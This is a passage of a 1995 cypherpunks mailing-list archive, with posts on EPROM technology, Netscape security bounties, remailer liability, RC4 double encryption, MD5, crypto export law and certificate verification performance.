masked proms programmed at birth by metalization pattersns and not
subject to non  destructive change after they leave the foundary, fuse
programable proms (which is basically a technology of the  70s to 80s)
and  CMOS proms that depend on patterns of  trapped charge injected into
insulating layers (crudely EPROMs and lots of cousins such as flash
EPROMs, eraseable PALS and FPGAs etc).  

	The old fashioned titanium fuse proms indeed did operate by
having the fuse elements literally blown open by the programming process
using higher voltages and special prgramming logic activated by the
higher voltages that allowed a given fuse to be addressed individually
and blown open (literally vaporized).    This process is obviously one
way (except in defective devices) and once a fuse has been blown (making
a 1 in a blank device a zero for example or enabling a circuit path in a
programmable logic device) there is nothing that can be done to reverse
the process.

	Fuse programmable parts are usually bipolar devices.  And for
the most part fuse programmable proms are small and very fast and
somewhat expensive and use lots of power.

	CMOS eprom technology (which has spread to many many kinds of
programmable logic devices as CMOS has become faster and faster due to
finer line geometries) depends on injecting pockets of charge into a
silicon glass insulating layer.  The electric field associated with
these pockets of charge acts as the gate of FETS built on top of the
insulating layer - turning on those transistors where there is charge
and leaving those off where there is not.   The classical UV eraseable
version of this technology is erased by exposing the device to UV light
which renders the silicon conductive which shorts out the trapped charge
sites.  A modern varient induces a controlled avalanche breakdown
through the silicon insulator region which also shorts out the stored
charge.  The later version is eraseable without UV light by electrical
action and is the technology used in many EEPROMs and Flash EPROMs.

	Thus the modern flash EPROM technology and its cousins in
programmable logic allows many (hundreds to tens of thousands)
of erasure and reprogramming (reinjectiong charge) cycles in modern
prom devices.

						Dave Emery


  > 
> nathan
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 15:04:19 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [NOISE] Re: Netscape rewards are an insult
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <199510192203.SAA10579@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Meta-noise, but I don't plan to lose any sleep over this....

Someone writing as Alice de 'nonymous writes:
> The Netscape Navigator client was DESIGNED to be controlled remotely from
> any machine on the Internet.  This is the "flawed algorithm".  W3 was
> meant to be hypertext ... not a gateway that permits a server to deliver
> customized byte bombs down a clearcut path by remote-control. 

Maybe I'm just too sheltered. But in a couple of years on the Net, I've only
ever seen _one person_ write "W3" as an abbreviation for World Wide Web
before now.

Alice, meet Fred. Fred, meet Alice.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 19 Oct 95 15:11:21 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510182003.QAA06276@opine.cs.umass.edu>
Message-ID: <199510192214.SAA18672@homeport.org>
MIME-Version: 1.0
Content-Type: text


Futplex wrote:

| The fundamental conflict, as I see it, is this: 
| For security reasons, we want messages to be distributed to a very wide
| audience, although those messages are only of interest to a very narrow
| audience. News admins understandably are generally inclined to accept
| bandwidth only in proportion to readership. For practical reasons, they don't
| want to carry messages to people who aren't interested in them. It's not
| easy to convince the news admins to do it anyway out of altruism.

	How about a local group, such as ucb.anonymous?  Those news
admins who wanted it could get it.  Not perfect, but reduced
polyticks, increased usablity.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 19 Oct 95 16:18:43 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <9510191718.AA19952@all.net>
Message-ID: <Pine.SUN.3.90.951019181226.14603A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello?!@# Guess no one is home. Lets see do I look like I work at Netscape?
Nope. Iam just repeating what I heard them told you for days now.
And my guess is no. They PR department is just a channel to get answers.

Do the White House PR department define policy? I hope not! But they are 
the ones what give the conferences and answer questions. Man, some people
have a tick skull.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Thu, 19 Oct 1995, Dr. Frederick B. Cohen wrote:

> Date: Thu, 19 Oct 1995 13:18:27 -0400 (EDT)
> From: Dr. Frederick B. Cohen <fc@all.net>
> To: Aleph One <aleph1@dfw.net>
> Cc: cypherpunks@toad.com
> Subject: Re: [NOISE] Re: Postscript in Netscape
> 
> > 
> > I belive you have been told *SAVERAL* times you *WONT* get an answer
> > on this list, and to contact their PR department. Why dont you do us all 
> > a favor. Contact the PR department if this questions really burns you so 
> > much. Get an answer. And post it on the list.
> 
> So the PR department defines security at Netscape?
> 
> -- 
> -> See: Info-Sec Heaven at URL http://all.net
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 19 Oct 95 16:25:55 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.90.951019182011.14603B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain




Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Thu, 19 Oct 1995 anonymous-remailer@shell.portal.com wrote:

> >   NETSCAPE CLIENT APIS (NCAPIS) 2.0

> Generally, we don't routinely trust every other computer, foreign or 
> domestic on the Internet to manipulate us by remote control.  This is
> as basic as the idea that we don't give out our PIN numbers with our 
> banking cards to anyone who asks us.  

Have you actually read the stuff? The NCAPIS is not on by default.
You *must* enable it by tellling it to which port to listen on.
Further more Mosaic had a remote control API before Netscape did.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Patterson <lep@tanju.wsnet.com>
Date: Thu, 19 Oct 95 16:42:21 PDT
To: cypherpunks@toad.com
Subject: PGPfone and (?) boxes
Message-ID: <Pine.LNX.3.91.951019183426.1453A-100000@tanju.wsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of months ago, the release of PGPfone got the list started on 
hardware alternatives to PTN encryption... An associate of mine recently 
returned from the Consumer Electronics show in Hong Kong and broght me a 
lot of stuff including a flyer for a telephone scrambler.

From the flyer:

Secure your telephone conversations through high-tech scrambling.

Never again be concerned with eavesdroppers!

Description:

With our state of the art Telephone Scrambler you can now discuss 
confidential business and/or personal matters over the public telephone 
network without worrying about eavesdroppers. This compact and easy to 
install unit renders taps and monitors useless by way of rolling code 
encryption. Eavesdroppers will hear nothing but gibberish, ensuring 
complete privacy for all your telephone conversations. The Telephone 
Scrambler allows you to set your own unique code ensuring that only you 
and the party that you are speaking with can decode the conversation. Two 
units are required -- one for each end of the conversation.

Features:

o One-touch scrambling
o Thousands of key combinations
o "Rollig code" scrambling
o Works with Tone or Pulse
o Easy connection
o LED display
o FCC registered
o Compact and Portable

Specifications:

Power: 12 VDC
Dimensions: 5 1/2" X 3" X 1"
Weight: 6 oz
PTN Connection: USOC TJ-11C
Keys: 2^12

Company is:

P3 Personal Protection Products
405 Park Avenue
New York, NY 10022
(212) 421-4757
(212) 421-5024 Fax


Well, in itself it isn't very impressive. However, I plan on giving them 
a call tomorrow and check prices. If they aren't that bad I'll get one 
and pull it apart. Perhaps it can be at least reprogrammed for more keys 
and another encryption algo. Hell, at 2^12 keys, all it takes is a few 
seconds to find which one the conversation is using.

Alan Patterson (lep@wsnet.com)        Fngpt: 41D0F61B496FECC09FABECF686AB2A1C
WSNetwork Communications Services, Inc.         PGP Encrypted Email Preferred
Montgomery, Alabama (334) 263-5505 (800) INET-750  Public Key @ MIT keyserver





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 19 Oct 95 11:25:34 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <199510191427.HAA10783@jobe.shell.portal.com>
Message-ID: <9510191823.AA02208@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Someone abused "Frederick B. Cohen"'s reputation by making him write :
 > > there is no way to do this in practice because as RSA-based signatures
 > > are actually implemented only hashes are signed.  This is done exactly to
 > > prevent this and similar attacks.
 > And how secure is the hash?
By design choice, "Very secure"...("the difficulty of coming up with
any message having a given message digest is on the order of 2^128
operationssee end") 
 > It it possible to create values that will
 > hash to each prime (or something else that does the job)?
No.
 > Is the hash
 > something we can figure a way to precompute using massively parallel
 > processing so that we can then provide a set of codes which will produce
 > the desired results? (etc.)
No.

Why wouldn't you try to answer the questions yourself before mailing
random thought ?
see RFC1321 The MD5 Message-Digest Algorithm
and numerous reviews...

Maybe I was being just "tested" and should not have replied :/

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Uzi security Marxist NSA ammunition NORAD FSF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 19 Oct 95 17:45:59 PDT
To: cypherpunks@toad.com
Subject: How was the Federal thing?
Message-ID: <199510191746.RAA11564@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can someone please offer a suummary of the
Federal Courthouse thing?

Love Always,

Carol Anne...now hooked on "Court Cypherpunk"
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIbw3IrpjEWs1wBlAQGbnwQAjzxulfm3DEporCzZic9Jb6Isq1Jvx8yU
M0y/e7npkNc+lVJ5M+aieFiGBormWsiYvAzGBqhK4H9OXs2J+HQX5sDs4LO9jqLj
52x5yc8djJN1opMdmi9g+V5/A8MzpBz32v9QzbRrZAAcRwWf9r9BK9edfvlhWqko
fZk8kv1F+8s=
=CrJS
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Thu, 19 Oct 95 17:25:14 PDT
To: cypherpunks@toad.com
Subject: Re: The NSA Visits Compendium
Message-ID: <199510200023.UAA03295@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SOL.3.91.951017102059.25411F-100000@eagle.nexor.co.uk>,
Andy Brown <asb@nexor.co.uk> wrote:
> On Mon, 16 Oct 1995, Peter Wayner wrote:
> 
> > [...]
> > The most interesting thing that he mentioned was thatthe company had to 
> > guarantee that the data would never be encrypted sequentially by two 
> > _different_ algorithms. Apparently double encryption by 40-bit RC-4 was 
> > okay, but using different algorithms was verboten.
> 
> Very interesting indeed.  With RC4 the bulk of the time is in key setup, 
> so if they could do two setups in parallel then the total time to search 
> a double-encrypted 40 bit keyspace would not be that great.
> 

Hold on -- was the NSA rep talking about double encryption
*with two different independent keys*, or talking about double
encryption with the same key?

Somehow I doubt the latter: for starters, double encryption
with the same key with a stream cipher is generally a Bad Idea.
(Remember Robert Morris's suggestion to ``always look for
plaintext?'') <grin>

In any event, double encryption with the same key is never
gonna be much more secure than single encryption, because it
doesn't increase the key space.


But if the NSA ref was allowing RC4 double encryption *with
two different independent secret keys*, then this *is* interesting!
There are well-known meet-in-the-middle attacks on double
encryption (with independent keys); but the standard one
requires lots of storage (2^40 storage -- this can't be
precomputed if you use 88 extra non-secret salt bits in the
key like SSL); a less well-known more recent attack doesn't
need the storage, but takes a bit longer (probably a few
hundred times longer) than brute force search of single
encryption.  van Oorschot & Wiener have a paper on this subject.

So did you use a SSL-like construction with lots of non-secret
salt bits in the key?

If not, then the 2^40 bytes of storage could be precomputed,
and I'd guess that this NSA position might mean that the NSA
has some Exabytes full of precomputed RC4 output for all possible
40 bit keys. :-)

Curious,
Dave Wagner
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBEAwUBMIbr9SoZzwIn1bdtAQGWOAF0DdBaTogLiH0QDSxjAI8iGeiXFLnPg8pT
2H0cv6rcSSo+23lqB3zZw3UP4uHGeZk=
=3KwF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 19 Oct 95 12:55:47 PDT
To: cypherpunks@toad.com
Subject: Re: crypto export from the UK
In-Reply-To: <4843.9510191407@misun2.mi.leeds.ac.uk>
Message-ID: <Pine.HPP.3.91.951019203347.12052A@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Oct 1995 jbaber@mi.leeds.ac.uk wrote:

> I believe that the laws regarding the export of crypto from the UK are
> very similar to the ITAR regs in the US. However our Government seems

According to the well researched list of various countries' crypto-laws
that Bert-Jaap Koops published on this list last July, the UK does not
have any laws against export of crypto. Here are some excerpts.

Mats

*****************************************************************

CRYPTO LAW SURVEY
Version July 1995
Bert-Jaap Koops (koops@kub.nl)
Please credit if quoting.

.................................<snip>   

----------------------------------------------------------------
SURVEY PER COUNTRY
1. Export/ import regulations
2. Other laws/regulations pertaining to encryption
3. Threats/ intentions to regulate encryption
4. Regulations stimulating encryption use
   
----------------------------------------------------------------
    
_COCOM_
1. COCOM (Coordinating Committee for Multilateral Export Controls)
is an international organization (Japan, Australia, and all NATO
members, Ireland excluded) for the mutual control (and restriction) of
strategic arms export. It maintains, among others, the International
Industrial List and the International Munitions List. In 1991, COCOM
has decided to allow export of mass-market cryptographic software
(including public domain software). Some member countries of COCOM
follow its regulations, but others, such as Germany and the
United States, maintain separate regulations.

.............................<snip>   

_United Kingdom_
1. COCOM regulations.
2.  no
3.  In its policy on the information superhighway, Labour states it does
not approve of escrowed encryption, but it wishes authorities to have the
power to demand decryption under judicial warrant.  It seems, then, that
Labour intends to penalize a refusal to comply with a demand to decrypt
under judicial warrant.
    
.............................<snip>

END




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@ozemail.com.au (lyal collins)
Date: Thu, 19 Oct 95 06:48:16 PDT
To: cypherpunks@toad.com
Subject: STT - useable in real life ?
Message-ID: <199510191347.XAA17540@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


From reading the STT specs, a 'credential' is made up of typically 4
certificates - root, country CA, issuer Ca, and cardholder/merchant.
Two certificates are based upon a 1024 bit public keys, 1 (root) is 2048
while the cardholder PK is 512/768 bit.
I believe a decrypt operation is required to verify each certificate.
I have seen test result from a local crypto company which indicate a 1024
bit decrypt operation will take between 2.5-30 seconds (Pentium 90 - 386/33
- I am trying to relate this to userland, not the well equipped cybernaut).
PK encrypt is somewhat faster. 
On this basis, a credential verify will take 10+ seconds up to several
minutes, on this range of equipment.
This seems to take a significant amount of time in verifying certificates.
This situation will only get worse as renewal certificates are appended to
existing certificates.
Can someone comment, or steer me in the right direction if I have
misunderstood certificate verification ?
Working for a bank who may have to use this one day, customer impact is a
big deal - we can afford specialised  hardware, but not all our customers can.
thanks for any clarification,
 lyal
All mistakes in this message belong to me - you should not use them!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 19 Oct 95 13:19:45 PDT
To: frenchie@magus.dgsys.com
Subject: Re: Motherload of Crypto Site...
In-Reply-To: <m0t5ftL-000xhiC@magus>
Message-ID: <199510192150.XAA00927@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


There are a lot of cryptographic software packages available outside
the United States.  The International Crypto WWW Pages at
http://www.cs.hut.fi/crypto contain a large index of available
packages and algorithms.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 20 Oct 95 00:59:29 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <199510182359.TAA16554@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




   That would have been a fine piece of work except that Java cannot
take complete control of Netscape. It can't replace the toolbar
buttons, it can't override default protocol handlers like http, etc.
The open location button, as far as I can tell, does not have Java
hooks and will always function as it is supposed to, by stopping
all running Java threads, and going to  a new page.


-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 19 Oct 95 18:49:03 PDT
To: cypherpunks@toad.com
Subject: PARTY! Nov. 18th, sponsored by Community ConneXion
Message-ID: <199510200143.SAA24338@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Subject: PARTY! Nov. 18th, sponsored by Community ConneXion

(Apologies if you receive this multiple times)

Mark your calenders...

	Community ConneXion: the Internet Privacy Provider is having a
party! We're partying to celebrate the spread of privacy on the net,
through the increased security of internet products, as well as the
growth of our services. (Many new services and new features on existing
services will likely be announced before the party. Stay tuned.)
	We're inviting all our customers and other potentially
interested parties, which includes you, if you've received this
note. So please join us, and send a copy of this invitation to anyone
else you may know who would be interested in attending.

Where: Icon Byte Bar & Grill
       299 9th Street (at Folsom)
       SF CA 94103
When:  Sat. Nov. 18 1995
       7:00 PM

	This is a good chance to meet and network with the people who
are making privacy on the internet a reality. Find out more about the
HackNetscape and HackMicrosoft contests. Learn about our specialized
web services, found nowhere else but at Community ConneXion. Hear
about the anonymous and psuedonymous servers here and what we're doing
to improve them.
	There will be catered snacks and a no-host bar.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Thu, 19 Oct 95 18:45:26 PDT
To: cypherpunks@toad.com
Subject: Ginetta Sagan to give Jing Lyman Lecture at Stanford
Message-ID: <v02110100acacaefbbafb@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


My apologies for cross posting this but she is really  a great speaker...


Todd



>Date: Thu, 19 Oct 1995 17:38:43 -0700 (PDT)
>From: Samson Tu <tu@camis.stanford.edu>
>Sender: Samson Tu <tu@camis.stanford.edu>
>Subject: Ginetta Sagan to give Jing Lyman Lecture at Stanford
>To: aiusancal@camis.stanford.edu, aiusagr19@camis.stanford.edu,
>        amnesty@lists.Stanford.EDU
>MIME-Version: 1.0
>
>Jing Lyman Lecture on Visionary Women
>
>Women in the Resistance During World War II and After
>
>               Ginetta Sagan
>Honorable Chair, Amnesty International USA Board of Directors
>
>Time: Noon-1pm, Wednesday October 25
>Place: Oak East, Tresidder Union
>       Stanford University Campus, Stanford
>Sponsored by: Institute for Research on Women and Gender
>
>end official announcement and begin personal plug:
>
>For those of you who don't know, Ginetta Sagan, a participant in the Italian
>Resistance during the WW II, is the godmother of Amnesty activities in the Bay
>area and beyond. She is a spunky, dynamic woman, and a great storyteller. Even
>though the title of the talk is about the past, she promises to mention
>Amnesty's current concerns. When I last talked to her, she was on the phone
>with the IS researcher on Algeria, getting the latest scoop. I especially urge
>Stanford Amnesty members to come and see a local celebrity and a great human
>rights activist. (Her husband, Dr. Sagan, is a consulting professor at
>Stanford.)
>

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Veeneman <system@decode.com>
Date: Thu, 19 Oct 95 18:01:42 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <yPV9cD1w165w@decode.com>
MIME-Version: 1.0
Content-Type: text/plain


"Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu> writes:

>    Without actually agreeing with the FAA, the reason you can't have a name
>    other than your own on your ticket, as well as why you are required to
>    be in your assigned seat on take-off and landing is because if there is 
>    a plane crash, they need to be able to identify an otherwise difficult
>    to identify body.

This is *not* how crash victim identification is done.  The FAR requirement
is only that passengers be _seated_ during takeoff and landing, not that
they be seated "where they're supposed to be."

In fact, many airlines do not assign seats at all.  First come first serve
for airlines like Southwest, ValuJet, Western Pacific, etc.

Actual victim identification varies from mundane (do they have a wallet
on their person, etc.) to rather more gristly methods.


>                                  Sorry about this,

Don't be sorry.

>                                       Bob

Dan


--
system@decode.com (Dan Veeneman)
Cryptography, Security, Privacy BBS  +1 410 730 6734   Data/FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Fri, 20 Oct 95 16:07:33 PDT
To: cypherpunks@toad.com
Subject: Re: transaction costs in anonymous markets
In-Reply-To: <Pine.3.89.9510180711.B37215-0100000@aix2.uottawa.ca>
Message-ID: <pnr898152169i@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In message <Pine.3.89.9510180711.B37215-0100000@aix2.uottawa.ca>, s1018954@aix2.uottawa.ca said:
> On Wed, 18 Oct 1995, David Murray wrote:
> 
> > B. Unilateral Anonymity. One party to the transaction is known, but the other
> > is unknowable. An example might be subscribing for a digital security with
> > ecash - the issuer is known, but the purchaser is anonymous.
> > 
> > C. Bilateral Anonymity. The identities of both parties to the transaction
> > are unknowable. This might be the case on a cypherpunk stock exchange...
> Or we could use the client/server terminology when possible.

I was actually vaguely referring to contract theory - unilateral and bilateral
executory contracts.

And this is where this discussion folds into Bob Hettinga's point about
non-repudiation. How can an anonymous party credibly bind its future actions?

One way is to hide the identity of the human/actor making the promise/contract
but leave their assets where the other party (the promisee) can get to them if
the anonymous party defaults. (The reputation of a pseudonym is an interesting
version of this.) A pledge of digital securities is a possibility; some sort
of protected pool of assets is another.

Alot of transactions/contracts only involve one party making a promise that
they have to perform in the future. When I get on a bus, once I've paid the
fare, only the bus company still has to perform its half of the contract
(although, as something of a complicating factor, I could still _breach_
the contract). This is why I used the subscription for a security as an
example - once I've paid my ecash, it's only the issuer that has to make
the coupon payments and redeem the security in the future - the contract is
unilaterally executory, with the known party still to perform.

But alot of contracts involve performance over time by _both_ parties - they
are bilaterally executory. It would seem that, to be effective, both of the
parties (or at least sufficient of their assets) must be known.

So, unilateral/bilateral anonymity is kind of the complement of unilateral/
bilateral executoriness.

Perhaps client/server terminology is better.

[And before someone points it out - alot of these issues have been explored
centuries ago, and the answers led to commercial innovations like bills of
exchange, bills of sale, bills of lading etc. I plan to spend more time
learning from legal history in the hope we are destined to repeat it...]

Whatever.

Dm.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIYWxVlo3j8JHzalAQFgJQQAndaHZT4pUsx2WojXsMaiI7cBblyDE2S6
v8b74NzuGxZpDsUjtQFTuqhbIbqPjpLuIxn7c0DjNAPoa0w3LwCOvtjUkDh4HiKj
UnlXu61I6Tf3KKUr4GmBadWmADdzfnPPXl7HFHr0GfH7a17ET97CVJzoYQTYl5xu
rI3y3gYe8e8=
=QDQf
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 23:22:26 PDT
To: cypherpunks@toad.com
Subject: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <acac7cd8430210046e54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I was out of town most of the past few days, when the debate about this
"Modest Proposal" happened. In reading the messages in the thread, I see a
lot of the issues mentione that we talked about several years ago--not that
this is a sin to talk about issues more than once--and that led to the
creation of "message pools" and groups like "alt.anonymous.messages". But
some new ideas are emerging. And I have a new idea for a remailer, so this
is turning out to be a fruitful topic! Too bad the topic has already died,
apparently.)

At 4:36 PM 10/18/95, Hal wrote:
>Eli Brandt <eli@UX3.SP.CS.CMU.EDU> writes:
>
>>If you
>>split the message into shadows, you avoid having anyone in this
>>position.
>
>I think splitting the message would be OK, but then the question is who
>is responsible for reassembling it?  If there were a "reassembly
>server" which took such messages, assembled them, and forwarded them,
>then we would be right back where we started from.  If the end user is
>responsible for reassembly, then that is tantamount to voluntarily
>agreeing to receive anonymous messages, and that is no problem.  The
>complaints we get are virtually 100% from people who didn't want to
>receive such messages, or see them posted.  And of course anonymous news
>postings via shadows would also have the reassembly problem.

Hal succinctly describes the conceptual flaws in many of these schemes to
replace the "last remailer" with something else: it usually turns out that
such replacements either don't work (forging headers) or merely shift the
problem to another agent.

The most practical short term approach is for any remailer operator feeling
some heat to do what Hal does with his Caltech remailer: remail to a site
less likely to cause problems. For example, bounce all messages through a
Netherlands remailer. (Even if the NL remailers are ultimately shut down,
using them accomplishes the practical purpose of removing the heat from
one's self...of course, they might feel the same way and lob the message
back to U.S. remailers!)

(Leading to the "Dining Buck Passers Problem," where a message never gets
delivered because all remailers are passing the buck by lobbing the message
to other remailers...."Charlie on the MTA.")


THE ROLE OF THE "MESSENGER"

But I think I have a longer term solution, one that involves a change in
thinking about the differences between the _originator_ of a message and
the mere _messenger_.

The notion is to much more explicitly separate the functions of the
"messenger" or "deliverer" from the "originator" or "sender." Granted, this
is already done in the sense that a piece of e-mail goes through many
hands. For example, Hal's message that I am responding to here has this in
the header blocks, showing some of the "couriers" or "messengers":

Return-Path: owner-cypherpunks@toad.com
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by you.got.net
(8.6.9/8.6.9) with ESMTP id KAA08536 for <tcmay@got.net>; Wed, 18 Oct 1995
10:47:24 -0700
Received: from toad.com by relay3.UU.NET with SMTP
        id QQzlzw04926; Wed, 18 Oct 1995 13:06:48 -0400
Received: by toad.com id AA06207; Wed, 18 Oct 95 09:38:06 PDT
Received: from nova.unix.portal.com by toad.com id AA06198; Wed, 18 Oct 95
09:38:02 PDT
Received: from jobe.shell.portal.com (jobe.shell.portal.com [156.151.3.4])
by nova.unix.portal.com (8.6.11/8.6.5) with ESMTP id JAA01733 for
<cypherpunks@toad.com>; Wed, 18 Oct 1995 09:36:59 -0700
Received: (hfinney@localhost) by jobe.shell.portal.com (8.6.11/8.6.5) id
JAA17879; Wed, 18 Oct 1995 09:36:58 -0700
Date: Wed, 18 Oct 1995 09:36:58 -0700
From: Hal <hfinney@shell.portal.com>

Now, by convention, we don't treat the _intermediate_ steps in the same way
that we treat the "From: Hal <hfinney@shell.portal.com>" step. So, why do
many treat _remailers_ as originators?

Mostly, it's education. People get a message from "remailer@kremvax.org"
and they are trained to think this is the sender. Or, they are trained to
think they can send a message back to this site, or to "root@kremvax.org"
complaining abou the mail they received and expecting that something will
be done to make it stop. But trying to educate people that a remailer is
not the same as a sender is likely to be a long and disappointing process.
A better approach is needed.

I believe that by changing the nature of remailers and making them much
more explicitly like messengers, couriers, and delivery services, that we
can win the public relations battle. There may still be legal challenges,
but at least the semantics will not be so confusing. Just as Willis Ware
made the point to Michael Froomkin about the confusing and misleading
semantics of "escrow," I believe the same is true of the confusing and
misleading semantics of "remailer." Perhaps we should just change the name
from "remailer" (or "mix") to "Message Delivery Services." Perhaps some of
you can think of a shorter and catchier term that still makes the messenger
role clear.


(I hang out on the Cyberial mailing list for cyberspace law discussions, so
I am well aware that any change such as I am suggesting must also be tested
as a legal strategy, and that conceptual ideas may not hold water, legally.
I won't address legal issues here, at least not now.)

The idea is to make it much more explicit that a remailer is merely
_delivering_ a message. Few people hold their local postal carrier
responsible for delivering a letter containing "bad material," be they
threats, hate speech, unwanted pornography, etc. Likewise, package delivery
services are generally not held responsible. And telephone answering
services are not treated as the authors of, say, threatening messages, when
they pass on messages such as:

"Tim, you received a call at 4:15 p.m. saying that if continue with your
project to collect reports of NSA visits to software companies that some
guys dressed in blue suits will try to run you down in your parking lot."

In these cases, we don't kill the messenger. We don't even sanction the
messenger. And it's more than just that we treat the messenger as being
ignorant of the contents, as the telephone message service example shows:
there are several examples I can think of immediately in which harmful or
hateful speech is relayed to someone with no expectation that the relayer
will face sanctions.

This is much more than the oft-cited doctrine of "common carrier" status,
where the government (it is claimed) grants to the phone company certain
rights and responsibilities with the proviso that it will not hold them
liable for the _content_ of phone calls. (I'm not sure if Federal Express
is treated as a "common carrier," but I'm fairly certain they are not held
liable for various evils delivered in sealed packages, with certain obvious
exceptions involving cooperation with law enforcement.)

I'm not a lawyer, but I believe the law recognizes (and has for a long
time) that the messenger of bad or harmful news, or mail, etc., is not to
be held liable. There are oft-debated examples involving a newspaper
